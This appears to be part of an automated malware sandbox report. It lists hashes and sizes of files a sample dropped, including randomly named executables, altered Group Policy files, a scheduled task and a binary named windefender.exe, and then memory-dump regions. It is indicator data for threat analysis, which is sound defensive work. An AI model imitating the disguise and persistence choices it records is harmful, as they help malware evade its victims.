SHA256aa5689332012817778e4ef3602e918297c567c4d573b463f86e8d98fef2eb48f
SHA512a93576bc04ac5b1ba129913c3d4e5100cf7f0f8bd7a4c9a21ce3af645624890006e087eefa5d0cbd804b7b96ebc13cf32a722b8c1d66d409879f41d5bfa974cb
-
C:\Users\Admin\Pictures\bhJ3c6tgDurzcpzQl6wOvaig.exeFilesize
5.7MB
MD51dae51f3d0f5c843fb164a5cdbff3e0c
SHA1d0322000f8601f1d7f2a7adbd40b495ee64feba1
SHA2569afd199318b7fb69ac524fc288f3074bb46be6247081cf7282890aad07139d1b
SHA5121100b6cc41bdd641d7ecbdf3d4348fa032bcf20099a75638be62f0fe83cf91bdc1b1f39086e87908acb1aeb0ee941f1ff9ca68cda02feb456db48c660324b8e0
-
C:\Users\Admin\Pictures\cm8TLyB3nNHPnDEvMuQEHVqP.exeFilesize
7KB
MD55b423612b36cde7f2745455c5dd82577
SHA10187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5e14eb493fbbe11303dfe459f4234e1ff
SHA1333726ec56265e7ce93bc4c50b9e20ccd25f507f
SHA25631620aea546e8894e0e59a5a24f4eb24f333dd9ac9675941deca1d797018b79f
SHA51229396c9ffb50d35387ebbb08a66cbc789ec78ee68de254c43738cc8c34e056da62c79d1d5afe754948ba5a10095c05a6a99c98977c76790ffa955614952921fd
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5d4214ea427bee78c310207094c240416
SHA1eb9f64536003491ed7bdf0f49a078ba627f22d49
SHA256ee8aa8d37a706dc3cc47c58b78f9e2509315d810eabef3acde69d51cb9817fc2
SHA512809463816de56a537a239dd3c02c1f8bc80a2321617828876ddb145f43c32e8048eed524eedaf0575d6954bdd7a3d778e4841f2f952c405b9511aa84947c90a9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5429325b143a47fb6aed2b72c66f604c2
SHA1b12a8b66e5faaa4702fd4349d310c1a3939021ca
SHA2564c3fd24c2ca69c37ac8552b7caf06ba38bb76b8ffb15102602a4a3e4fff38a34
SHA512630ed6c7ca16342e5a684c0d61c28b6c5834b3d60d47de48616cab4a52336ad6c7667384640fb7de9fcc53c3502a766b7b4dc238aa55905d805f40bb26afde2e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD54f45be09c740a74e5b2db5ff8cc34dde
SHA1b4ca3e71d72f4572a3b680c1710febcd5918b229
SHA256c7d22902f58576bf12ed98a16fbb3094b7dfa0ecc93dd9cf4ee413c768fc22b6
SHA512958fa33bf7d293b2d81b6ab76d94db17370631f3e7781c28a37d5f724447586d3420243628e39526ae72b01bb8dfc88f7bb630bd85ea60567e88fa9b743d7cc2
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD56bbf65cd0739dbe476f758d8e4c89261
SHA13e0126db0861dd3577841527d56c58a716d2c1e6
SHA2563d3c22a1c6a8c9ca9c3c5f3da95d714066b5e23f304f31e6454c4a523f36bdd7
SHA5128002d4879d0109a3c77b43f43a9320801832f83b6986e57cd5d2c1e217fb5eb63f6be7b8f0f054d125ceb75001421faa0bfcd479bed375f3773b9f1f16d6fa7f
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD518fb7c56473f7712ec8ede4730bccffa
SHA138996201a04f4be7c632104fdb2657378aba194f
SHA25650cfb711ad3dadf21b5867251da5eac1a00f823193c5e9f20ac5e85866bfd50e
SHA5124a6b269215530763185ebe2e68d94b0d346accb12287f9c748d7a94ad497a969184ca1d3c4d2899e27960de6440b28178d84632b8b225ad9b0d8b5ad38595756
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5c61c454205c5217a9e40cc8544989241
SHA1dbc669581f8834ba0dc9fdcea604b0a467cb9a5a
SHA2566cab9dfb0f35904303872e4f3de3350c3511a59f829abdea21378031caced17e
SHA5126d8f30cb8c8ba944cfcf0e45f74026ff750c27fa6cd0103c013783c45e3e1fc041b1a7af3028139f4dda3d6747650e31e659116e65a69da7e003e913536789e9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD507bf4f7c3463ba38eaa8db8f7da979b4
SHA136382e77a5401aa818a48323f8a4e2c0af662c30
SHA25681d7b47185d42bc10e4929c31c29eff46315a7e2eff33543c8fc44bfadd11fc6
SHA5127bf9e201fc6e01243a84ef2e1ab5123eef126737f1c926b30a7847c4ca7653cab11433101488c4dbeaa298f1939f95ba1b1fb28886434e9faa233b3875293faf
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
C:\Windows\Tasks\bWycNackLSywaqkmgR.jobFilesize
522B
MD54496fc1d2902d1afa9482b60c06c2833
SHA1bbd8ab67145545652516b9fc9717fa6e78ea73f6
SHA256608eef6d0ecae8ee1665513b59a4c8042c69e53bfdb2a7b0b80036a58c62f374
SHA5129cc37a31b871b8adaa605506e8f777a1c016a9a531add91f6e524156e8d796e42420e40d76028634d2d2504258a6c272bc9bd30fcf332c33a1f44a404bdb531c
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
8KB
MD589daeb0564e2cb47ea25cd4da8cc0573
SHA1bd504804cc98ebc23b396fde76ffdc06fb289812
SHA256b496f871c962580042f679da62499d67390d8ea84cbb0f5515bff673ad540ddc
SHA512b341e832809b203e4e8be9d9137d9df0a11dba9c4e8bb909584895989641adef90132644648a056f8a10be13fcfdb12f07b27ec5902b00f593b2fef29fa5b27c
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
1KB
MD5cdfd60e717a44c2349b553e011958b85
SHA1431136102a6fb52a00e416964d4c27089155f73b
SHA2560ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
C:\Windows\windefender.exeFilesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
memory/476-165-0x0000000000400000-0x0000000002C27000-memory.dmpFilesize
40.2MB
-
memory/476-154-0x0000000000400000-0x0000000002C27000-memory.dmpFilesize
40.2MB
-
memory/476-151-0x00000000030E0000-0x0000000003107000-memory.dmpFilesize
156KB
-
memory/476-150-0x0000000002DA0000-0x0000000002EA0000-memory.dmpFilesize
1024KB
-
memory/576-147-0x0000000007CC0000-0x0000000007CCA000-memory.dmpFilesize
40KB
-
memory/576-85-0x0000000006140000-0x00000000061A6000-memory.dmpFilesize
408KB
-
memory/576-82-0x0000000003420000-0x0000000003430000-memory.dmpFilesize
64KB
-
memory/576-132-0x0000000007B30000-0x0000000007B4E000-memory.dmpFilesize
120KB
-
memory/576-78-0x0000000005AA0000-0x00000000060CA000-memory.dmpFilesize
6.2MB
-
memory/576-145-0x00000000082C0000-0x000000000893A000-memory.dmpFilesize
6.5MB
-
memory/576-79-0x0000000074FA0000-0x0000000075751000-memory.dmpFilesize
7.7MB
-
memory/576-117-0x000000007F5D0000-0x000000007F5E0000-memory.dmpFilesize
64KB
-
memory/576-121-0x000000006FC70000-0x000000006FFC7000-memory.dmpFilesize
3.3MB
-
memory/576-148-0x0000000007DD0000-0x0000000007E66000-memory.dmpFilesize
600KB
-
memory/576-149-0x0000000007CE0000-0x0000000007CF1000-memory.dmpFilesize
68KB
-
memory/576-143-0x0000000003420000-0x0000000003430000-memory.dmpFilesize
64KB
-
memory/576-105-0x0000000006780000-0x00000000067CC000-memory.dmpFilesize
304KB
-
memory/576-118-0x0000000070050000-0x000000007009C000-memory.dmpFilesize
304KB
-
memory/576-153-0x0000000007D40000-0x0000000007D55000-memory.dmpFilesize
84KB
-
memory/576-104-0x00000000066D0000-0x00000000066EE000-memory.dmpFilesize
120KB
-
memory/576-155-0x0000000007D90000-0x0000000007DAA000-memory.dmpFilesize
104KB
-
memory/576-116-0x0000000007AD0000-0x0000000007B04000-memory.dmpFilesize
208KB
-
memory/576-108-0x0000000006C50000-0x0000000006C96000-memory.dmpFilesize
280KB
-
memory/576-160-0x0000000074FA0000-0x0000000075751000-memory.dmpFilesize
7.7MB
-
memory/576-103-0x0000000006220000-0x0000000006577000-memory.dmpFilesize
3.3MB
-
memory/768-768-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/1524-519-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmpFilesize
7.3MB
-
memory/1524-511-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmpFilesize
7.3MB
-
memory/1524-520-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmpFilesize
7.3MB
-
memory/1524-507-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmpFilesize
7.3MB
-
memory/1524-509-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmpFilesize
7.3MB
-
memory/1524-510-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmpFilesize
7.3MB
-
memory/1524-512-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmpFilesize
7.3MB
-
memory/1524-516-0x00007FF7AE000000-0x00007FF7AE745000-memory.dmpFilesize
7.3MB
-
memory/1596-169-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/1596-76-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/1596-75-0x00000000052A0000-0x0000000005B8B000-memory.dmpFilesize
8.9MB
-
memory/1596-71-0x00000000036F0000-0x0000000003AF7000-memory.dmpFilesize
4.0MB
-
memory/1700-803-0x0000000010000000-0x0000000013BC3000-memory.dmpFilesize
59.8MB
-
memory/2088-772-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/2088-831-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/2468-452-0x000000006F0A0000-0x000000006F21D000-memory.dmpFilesize
1.5MB
-
memory/2468-325-0x00007FFE6F320000-0x00007FFE6F529000-memory.dmpFilesize
2.0MB
-
memory/2496-259-0x000000006F0A0000-0x000000006F21D000-memory.dmpFilesize
1.5MB
-
memory/2496-260-0x00007FFE6F320000-0x00007FFE6F529000-memory.dmpFilesize
2.0MB
-
memory/2496-267-0x000000006F0A0000-0x000000006F21D000-memory.dmpFilesize
1.5MB
-
memory/2916-720-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/2916-882-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/2916-771-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/2916-828-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/2916-888-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/2916-769-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/2916-830-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/3000-895-0x0000000010000000-0x0000000013BC3000-memory.dmpFilesize
59.8MB
-
memory/3000-909-0x00000000052F0000-0x0000000005375000-memory.dmpFilesize
532KB
-
memory/3144-168-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/3144-73-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/3144-74-0x00000000035F0000-0x00000000039E9000-memory.dmpFilesize
4.0MB
-
memory/3144-72-0x0000000005190000-0x0000000005A7B000-memory.dmpFilesize
8.9MB
-
memory/3284-4-0x00007FFE4E4D0000-0x00007FFE4EF92000-memory.dmpFilesize
10.8MB
-
memory/3284-20-0x00007FFE4E4D0000-0x00007FFE4EF92000-memory.dmpFilesize
10.8MB
-
memory/3284-16-0x00000159A1560000-0x00000159A1570000-memory.dmpFilesize
64KB
-
memory/3284-12-0x00000159B9C30000-0x00000159B9C52000-memory.dmpFilesize
136KB
-
memory/3284-6-0x00000159A1560000-0x00000159A1570000-memory.dmpFilesize
64KB
-
memory/3284-5-0x00000159A1560000-0x00000159A1570000-memory.dmpFilesize
64KB
-
memory/3524-514-0x000000006D710000-0x000000006EA27000-memory.dmpFilesize
19.1MB
-
memory/3544-737-0x0000000010000000-0x0000000013BC3000-memory.dmpFilesize
59.8MB
-
memory/3624-566-0x0000000000400000-0x00000000008AD000-memory.dmpFilesize
4.7MB
-
memory/3624-547-0x0000000000400000-0x00000000008AD000-memory.dmpFilesize
4.7MB
-
memory/3692-444-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB
-
memory/4180-156-0x0000000000400000-0x0000000000869000-memory.dmpFilesize
4.4MB
-
memory/4180-470-0x0000000000400000-0x0000000000869000-memory.dmpFilesize
4.4MB
-
memory/4180-172-0x0000000000AF0000-0x0000000000BF0000-memory.dmpFilesize
1024KB
-
memory/4180-270-0x0000000000400000-0x0000000000869000-memory.dmpFilesize
4.4MB
-
memory/4180-48-0x0000000000400000-0x0000000000869000-memory.dmpFilesize
4.4MB
-
memory/4180-46-0x0000000000AF0000-0x0000000000BF0000-memory.dmpFilesize
1024KB
-
memory/4180-47-0x00000000025B0000-0x000000000261D000-memory.dmpFilesize
436KB
-
memory/4404-835-0x0000000010000000-0x0000000013BC3000-memory.dmpFilesize
59.8MB
-
memory/4564-0-0x0000023961E90000-0x0000023961EFE000-memory.dmpFilesize
440KB
-
memory/4564-23-0x00007FFE4E4D0000-0x00007FFE4EF92000-memory.dmpFilesize
10.8MB
-
memory/4564-3-0x0000023963CE0000-0x0000023963D3E000-memory.dmpFilesize
376KB
-
memory/4564-2-0x0000023962390000-0x00000239623A0000-memory.dmpFilesize
64KB
-
memory/4564-1-0x00007FFE4E4D0000-0x00007FFE4EF92000-memory.dmpFilesize
10.8MB
-
memory/4984-83-0x0000000005290000-0x00000000052B2000-memory.dmpFilesize
136KB
-
memory/4984-142-0x0000000004D60000-0x0000000004D70000-memory.dmpFilesize
64KB
-
memory/4984-80-0x0000000074FA0000-0x0000000075751000-memory.dmpFilesize
7.7MB
-
memory/4984-81-0x0000000004D60000-0x0000000004D70000-memory.dmpFilesize
64KB
-
memory/4984-84-0x0000000004D60000-0x0000000004D70000-memory.dmpFilesize
64KB
-
memory/4984-94-0x0000000005D70000-0x0000000005DD6000-memory.dmpFilesize
408KB
-
memory/4984-123-0x000000007FA90000-0x000000007FAA0000-memory.dmpFilesize
64KB
-
memory/4984-122-0x000000006FC70000-0x000000006FFC7000-memory.dmpFilesize
3.3MB
-
memory/4984-141-0x00000000075E0000-0x0000000007684000-memory.dmpFilesize
656KB
-
memory/4984-164-0x0000000074FA0000-0x0000000075751000-memory.dmpFilesize
7.7MB
-
memory/4984-157-0x00000000078A0000-0x00000000078A8000-memory.dmpFilesize
32KB
-
memory/4984-77-0x0000000004CA0000-0x0000000004CD6000-memory.dmpFilesize
216KB
-
memory/4984-152-0x00000000077B0000-0x00000000077BE000-memory.dmpFilesize
56KB
-
memory/4984-119-0x0000000070050000-0x000000007009C000-memory.dmpFilesize
304KB
-
memory/4984-146-0x0000000007700000-0x000000000771A000-memory.dmpFilesize
104KB
-
memory/4992-120-0x0000000074FA0000-0x0000000075751000-memory.dmpFilesize
7.7MB
-
memory/4992-144-0x0000000004EE0000-0x0000000004EF0000-memory.dmpFilesize
64KB
-
memory/4992-17-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/4992-21-0x0000000074FA0000-0x0000000075751000-memory.dmpFilesize
7.7MB
-
memory/4992-22-0x0000000004EE0000-0x0000000004EF0000-memory.dmpFilesize
64KB
-
memory/4996-450-0x0000000000400000-0x000000000300A000-memory.dmpFilesize
44.0MB